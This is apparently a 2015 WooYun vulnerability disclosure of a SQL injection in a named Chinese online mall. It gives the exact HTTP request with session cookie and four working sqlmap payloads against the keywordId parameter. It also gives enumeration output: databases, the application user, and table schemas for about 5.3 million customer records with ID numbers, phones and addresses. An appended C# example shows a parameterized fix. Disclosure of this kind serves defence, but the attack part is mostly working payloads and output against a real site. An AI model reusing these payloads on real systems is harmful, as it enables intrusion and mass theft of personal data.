
A certain online mall has a SQL injection that exposes 5 million+ (500w+) user records and 6 million+ (600w+) merchant records

2015-07-10 07:50

Code:
GET /knowledgelist.aspx?keywordId=1&newstypeId=&productId=642 HTTP/1.1

X-Requested-With: XMLHttpRequest

Referer: http://www.1mutian.com:80/

Cookie: ASP.NET_SessionId=njtdkt1ldnmtapglbxntnrar; BrowedProductList-Admin=%3c%3fxml+version%3d%221.0%22+encoding%3d%22utf-16%22%3f%3e%0d%0a%3cArrayOfInt+xmlns%3axsi%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXMLSchema-instance%22+xmlns%3axsd%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXMLSchema%22%3e%0d%0a++%3cint%3e686%3c%2fint%3e%0d%0a++%3cint%3e1878%3c%2fint%3e%0d%0a++%3cint%3e1859%3c%2fint%3e%0d%0a++%3cint%3e1427%3c%2fint%3e%0d%0a++%3cint%3e1411%3c%2fint%3e%0d%0a++%3cint%3e438%3c%2fint%3e%0d%0a++%3cint%3e396%3c%2fint%3e%0d%0a++%3cint%3e790%3c%2fint%3e%0d%0a++%3cint%3e1861%3c%2fint%3e%0d%0a++%3cint%3e1660%3c%2fint%3e%0d%0a++%3cint%3e1674%3c%2fint%3e%0d%0a%3c%2fArrayOfInt%3e; CheckCode=DHJ8J; 1=1

Host: www.1mutian.com

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36

Accept: */*

Proof of vulnerability:

Code:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Parameter: keywordId (GET)

Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

Payload: keywordId=1' AND 7323=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7323=7323) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113))) AND 'FTtm'='FTtm&newstypeId=&productId=642



Type: UNION query

Title: Generic UNION query (NULL) - 1 column

Payload: keywordId=-7874' UNION ALL SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(121)+CHAR(89)+CHAR(73)+CHAR(108)+CHAR(85)+CHAR(110)+CHAR(108)+CHAR(87)+CHAR(97)+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113)-- &newstypeId=&productId=642



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: keywordId=1'; WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: keywordId=1' WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642

---

web server operating system: Windows 2008 or Vista

web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0

back-end DBMS: Microsoft SQL Server 2008

current user: 'ymt'

current database: 'YMTTransDb'

available databases [10]:

[*] CustomerUser

[*] master

[*] MobileSymbol

[*] model

[*] msdb

[*] ReportServer

[*] ReportServerTempDB

[*] tempdb

[*] YMTShopDate

[*] YMTTransDb



Database: CustomerUser

[3 tables]

+---------------------+
| CustomerInformation |
| T_DeletePhone       |
| 私人营业库          |
+---------------------+



Database: CustomerUser

Table: CustomerInformation

[15 columns]

+--------------+----------+
| Column       | Type     |
+--------------+----------+
| id           | int      |
| mobile       | varchar  |
| 使用人       | nvarchar |
| 出生日期     | nvarchar |
| 初次登记日期 | datetime |
| 卡型         | nvarchar |
| 名字         | nvarchar |
| 地址         | nvarchar |
| 套餐更改日期 | datetime |
| 性别         | nvarchar |
| 手机         | float    |
| 有效日期     | datetime |
| 证件号码     | nvarchar |
| 话费         | nvarchar |
| 邮编         | nvarchar |
+--------------+----------+



Database: CustomerUser

+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| dbo.CustomerInformation | 5294405 |
+-------------------------+---------+



Database: CustomerUser

+----------------+---------+
| Table          | Entries |
+----------------+---------+
| dbo.私人营业库 | 6847309 |
+----------------+---------+



Database: CustomerUser

Table: 私人营业库

[4 columns]

+----------+----------+
| Column   | Type     |
+----------+----------+
| Address  | nvarchar |
| MailNo   | nvarchar |
| TelPhone | nvarchar |
| Username | nvarchar |
+----------+----------+





I won't dump the data.

Remediation:

You know what to do.
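The report leaves the fix implied. As an added example (not code from the report or from the site), here is the pattern the sqlmap findings point to, a string-built T-SQL statement in which keywordId lands inside a quoted literal, beside a parameterized replacement; the table name, column names and connection string are assumptions.

```csharp
// Added example, not code from the report or the site. Table and column
// names are hypothetical; the fix is type validation plus bound parameters.
using System;
using System.Collections.Generic;
using System.Data;
using System.Data.SqlClient;

public static class KnowledgeRepository
{
    // BEFORE: the value of ?keywordId= is pasted into the statement as text.
    // A value such as  1' AND 7323=CONVERT(INT,(SELECT ...)) AND 'FTtm'='FTtm
    // closes the literal and becomes part of the query, and a ';' starts a
    // second statement, which is what the WAITFOR DELAY findings confirm.
    public static string BuildQueryUnsafe(string keywordId, string productId)
    {
        return "SELECT Title, Body FROM dbo.KnowledgeArticle "
             + "WHERE KeywordId = '" + keywordId + "' "
             + "AND ProductId = '" + productId + "'";
    }

    // AFTER: validate the type at the boundary and bind values as parameters.
    // The statement text never contains user input, so quotes, comments and
    // semicolons arriving in the request are data, not T-SQL.
    public static List<(string Title, string Body)> GetArticles(
        string connectionString, string keywordIdRaw, string productIdRaw)
    {
        if (!int.TryParse(keywordIdRaw, out int keywordId) ||
            !int.TryParse(productIdRaw, out int productId))
            throw new ArgumentException("keywordId and productId must be integers");

        const string sql =
            "SELECT Title, Body FROM dbo.KnowledgeArticle " +
            "WHERE KeywordId = @keywordId AND ProductId = @productId";

        var rows = new List<(string, string)>();
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@keywordId", SqlDbType.Int).Value = keywordId;
            cmd.Parameters.Add("@productId", SqlDbType.Int).Value = productId;
            conn.Open();
            using (SqlDataReader reader = cmd.ExecuteReader())
                while (reader.Read())
                    rows.Add((reader.GetString(0), reader.GetString(1)));
        }
        return rows;
    }
}
```

Because the same injection point enumerated ten databases including master and ReportServer, the application login ('ymt' in the output) also warrants a least-privilege review, not just the query fix.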

Source: www.wooyun.org/bugs/wooyun-2015-0116138
